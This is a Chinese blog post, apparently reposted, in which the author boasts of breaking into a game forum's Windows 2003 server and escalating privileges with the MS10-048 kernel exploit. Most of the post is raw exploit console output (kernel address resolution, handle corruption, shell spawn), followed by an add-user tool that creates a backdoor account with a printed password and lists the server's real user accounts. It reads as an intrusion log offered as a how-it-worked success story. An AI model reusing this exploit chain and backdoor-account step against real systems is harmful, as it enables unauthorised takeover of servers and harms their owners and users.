MS10048依旧是Windows 2003 x86 的杀器

今天搞了个wow的游戏论坛，服务器环境是win03 x86+iis6.0+php+mysql。

提权的时候各种无奈，mysql无权限，而且没root，试了几个别的方法都不行，实在没办法的时候，用MS10048试了下，成功了。

Dojibiron by Ronald Huizer, (c) master#h4cker.us  

[ ] Trying to allocate a page at NULL.
    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001
[ ] Bootstrapping kernel resolver.
    Module ntoskrnl.exe at 0x0000000000BD0000
    Base of driver: 0xFFFFF80001000000
    [+] Success.
[ ] Resolving PsReferencePrimaryToken
    [+] Success: 0xFFFFF8000129FE50
[ ] Resolving PsInitialSystemProcess
    [+] Success: 0xFFFFF800011D1FB0
[ ] Resolving PsLookupProcessByProcessId
    [+] Success: 0xFFFFF80001288BC0
[ ] Resolving PsDereferencePrimaryToken
    [+] Success: 0xFFFFF80001311B40
[+] Handle table retrieval succeeded.
    Userspace handle table: 0x00000000006B0000
    Kernelspace handle table: 0xFFFFF97FF7990000
    Handle table entries: 1024
[ ] Allocating fake HEAD page.
    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF
[ ] Setting up CBT filter hook.
    [+] Success.
[ ] Creating evil window
    [+] Success.
[ ] Destroyed handle at: 0xFFFFF97FF7990FC0
    pHead:	0xFFFFF97FF906BA00
    pOwner:	0xFFFFFA80000E8D80
    bType:	0x01 - TYPE_WINDOW
    bFlags:	0x00 - 
    wUniq:	0x0004
[ ] Trigger handle at: 0xFFFFF97FF7995AC0
    pHead:	0xFFFFF97FF90900A0
    pOwner:	0xFFFFFA80000E8D80
    bType:	0x01 - TYPE_WINDOW
    bFlags:	0x00 - 
    wUniq:	0x0003
[ ] Writing pool addr to: 0xFFFFF97FF7990F7F

	~ MS10_048 X64 EXP        ~

	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110
	11111111110101010101111010101110101010101010101010101010111100000000000110
	110101010101010101010101010111100000000000110
	111100000000000110
	0000110
[ ] Checking the success flag.
    [+] Set to 2 exploit half succeeded
[ ] Destroying trigger window
    pHead:	0x00000000000003CA
    pOwner:	0x0000000000000000
    bType:	0x00 - TYPE_FREE
    bFlags:	0x00 - 
    wUniq:	0x0004
[ ] Spawning half a shell...
    Command: D:RECYCLERadd.exe
[+] Enjoy!
          ==========================================

              Api Add User Made By Cond0r

                    2011.3.20
              Adduser.exe UserName PassWord Group
          ==========================================
	 User List:

	-->  7ksf
	-->  ASPNET
	-->  Guestasdfa
	-->  IUSR_NJXW-12-5-2
	-->  IWAM_NJXW-12-5-2
	-->  SUPPORT_388945a0



	Group List:

	 --> Administrators 
	 --> Backup Operators 
	 --> Distributed COM Users 
	 --> Guests 
	 --> Network Configuration Operators 
	 --> Performance Log Users 
	 --> Performance Monitor Users 
	 --> Power Users 
	 --> Print Operators 
	 --> Remote Desktop Users 
	 --> Replicator 
	 --> Users 
	 --> HelpServicesGroup 
	 --> IIS_WPG 
	 --> TelnetClients 

 SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

利用api加用户工具，成功添加cond0r密码为123!@#asdASD的账户

相关阅读:
使用apt-mirror建立本地debian仓库源
 在MacOS上利用docker构建buildroot
mac开发错误：errSecInternalComponent
NFS作为根文件系统，挂载超时
 关于物体 '固有类别' 与 '实际使用类别' 分离的情况，结构体定义方法
 Crontab could not create directory .ssh
mac bash_profile
Mac bash rc
watchtower无法自动更新镜像的解决方法
 spring security oAuth2.0 数据库说明
原文地址：https://www.cnblogs.com/hookjoy/p/3608694.html